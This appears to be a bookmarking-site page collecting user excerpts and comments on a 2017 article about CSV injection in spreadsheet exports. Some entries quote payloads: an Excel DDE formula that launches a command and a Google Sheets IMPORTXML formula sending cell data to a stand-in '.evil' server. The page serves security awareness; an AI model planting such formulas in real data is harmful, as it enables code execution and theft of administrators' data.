The Absurdly Underestimated Dangers of CSV Injection


134 bookmarks. First posted by fileformat october 2017.


I’ve been doing the local usergroup circuit with this lately and have been asked to write it up.

In some ways this is old news, but in other ways…well, I think few realize how absolutely devastating and omnipresent this vulnerability can be. It is an attack vector available in every application I’ve ever seen that takes user input and allows administrators to bulk export to CSV.

That is just about every application.

Edit: Credit where due, I’ve been pointed to this article from 2014 by an actual security pro which discusses some of these vectors. And another one.

So let’s set the scene - imagine a time or ticket tracking app. Users enter their time (or tickets) but cannot view those of other users. A site administrator then comes along and exports entries to a csv file, opening it up in a spreadsheet application. Pretty standard stuff.
security  excel  spreadsheets  netsec 
9 weeks ago by danwin
The Absurdly Underestimated Dangers of CSV Injection
from twitter_favs
january 2018 by kinlane
The Absurdly Underestimated Dangers of CSV Injection
from twitter_favs
january 2018 by dnene
Excel interprets `|` in formulas to execute commands!

"=2+5+cmd|' /C calc'!A0"

There's a warning, but CSVs are widely believed to be "just data", so even tech-savvy admins ignore it.

Google sheets has formulas that can fetch remote data, e.g. IMPORTXML. A query string appended to that can exfiltrate any data not just from that sheet, but from OTHER SHEETS whose IDs are known.

"=IMPORTXML(CONCAT(""http://some-server-with-log.evil?v="", CONCATENATE(A2:E2)), ""//a"")"
cool  CSV  security  data  exfiltration  exploit 
january 2018 by dandv
It's somewhat comforting to note this doesn't affect things like R or Python/Pandas.

https://t.co/i0EjLEyFth
via:packrati.us 
november 2017 by cdgrau
wow! didn't know this about csv - can execute formula, make external requests, etc.
injection  security  standards  vulnerability  hacking  design 
november 2017 by teffalump
RT : The Absurdly Underestimated Dangers of CSV Injection
from twitter
october 2017 by daisyk
CSV injection
csv  security  Excel 
october 2017 by lost_in_space
RT : the absurdly underestimated dangers of CSV injection (and how to mitigate them):
programming  security  webdev  from twitter
october 2017 by sarcas
The Absurdly Underestimated Dangers of CSV Injection I’ve been doing the local usergroup circuit with this lately and have been asked to write it up. In some ways this is old news, but in other ways…well, I think…
IFTTT  Instapaper 
october 2017 by ldodds
I’ve been doing the local usergroup circuit with this lately and have been asked to write it up. In some ways this is old news, but in other ways…well, I think few realize how absolutely devastating and omnipresent this vulnerability can be. via Pocket
Pocket 
october 2017 by driptray
RT : The Absurdly Underestimated Dangers of CSV Injection
from twitter
october 2017 by brandizzi
The Absurdly Underestimated Dangers of CSV Injection
security  attackvector  csv  dataInjectionAttack  vector  attack 
october 2017 by psychemedia
In fact - in Excel at least - any of the symbols = , - , + , or @ will trigger this behavior causing lots of fun times for adminstrators whose data just doesn’t seem to format correctly (this is actually what brought my attention first to the issue). And just like that, the attacker has free reign to download a keylogger, install things, and overall remotely execute code not merely on any other person’s computer, but on that of someone guaranteed to have access to all user’s data; for example a manager or a company adminstrator. The attacker starts the cell with their trusty = symbol prefix and then points IMPORTXML to a server they control, appending as a querystring of spreadsheet data. That information isn’t usually considered secret; it appears in the spreadsheet urls, and will often be accidentally emailed, or posted in intra-company documentation, relying on Google’s security to ensure only authorized users access that data. That way, if a reseracher working on a secret warrant is to view their communication in a spreadsheet, a beacon goes out and the criminal has a canary effectively tipping them off that someone is snooping.
october 2017 by sechilds
The Absurdly Underestimated Dangers of CSV Injection
from twitter
october 2017 by rnm
Any cell that starts with an = is treated as a formula.
You can then execute any formula function.
security  excel  google  csv  injection 
october 2017 by drmeme
This isn't frightening at all because CSV exports from XLS don't run the world or anything.
from twitter_favs
october 2017 by nowthis
In some ways this is old news, but in other ways…well, I think few realize how absolutely devastating and omnipresent this vulnerability can be. It is an attack vector available in every application I’ve ever seen that takes user input and allows administrators to bulk export to CSV.
csv  excel  google  security 
october 2017 by ssorc
info leak and code exec
csv  injection  google  excel  command 
october 2017 by plaxx
I’ve been doing the local usergroup circuit with this lately and have been asked to write it up. In some ways this is old news, but in other ways…well, I think few realize how absolutely devastating and omnipresent this vulnerability can be. It is an attack vector available in every application I’ve ever seen that takes user input and allows administrators to bulk export to CSV.
excel  security  google 
october 2017 by danesparza
You can include an arbitrary formula, VBA script, or even shell command in a CSV file and MS Excel will execute it at load time with the current user's privileges. Oy.

You can't do this with Google Sheets, but you *can* send all the data in the spreadsheet, and any others that user can reach, to some x-random URI. This is not much nicer.
security  excel  csv  shellinjection 
october 2017 by yorksranter
The Absurdly Underestimated Dangers of CSV Injection
from twitter_favs
october 2017 by reinhard_codes
CSV can be really dangerous.
CSV  attack  hacking 
october 2017 by traggett
I thought by now I'd be too jaded to find anything about spreadsheets shocking, but then I read this.
from twitter_favs
october 2017 by cpsievert
Dang.
s 
october 2017 by jgordon
Man kann mit einer csv Datei den Taschenrechner und alles andere starten? Oh. Autsch.
from twitter
october 2017 by svensonsan
Interesting explanation of “an attack vector available in every application I’ve ever seen that takes user input and allows administrators to bulk export to CSV.”
security 
october 2017 by shiflett
RT : Well this seems interesting in a bad way
h/t to and his 4 short links
from twitter_favs
october 2017 by gnat
I’ve been doing the local usergroup circuit with this lately and have been asked to write it up. In some ways this is old news ( Edit: Credit where due, I’ve…
from instapaper
october 2017 by nielsk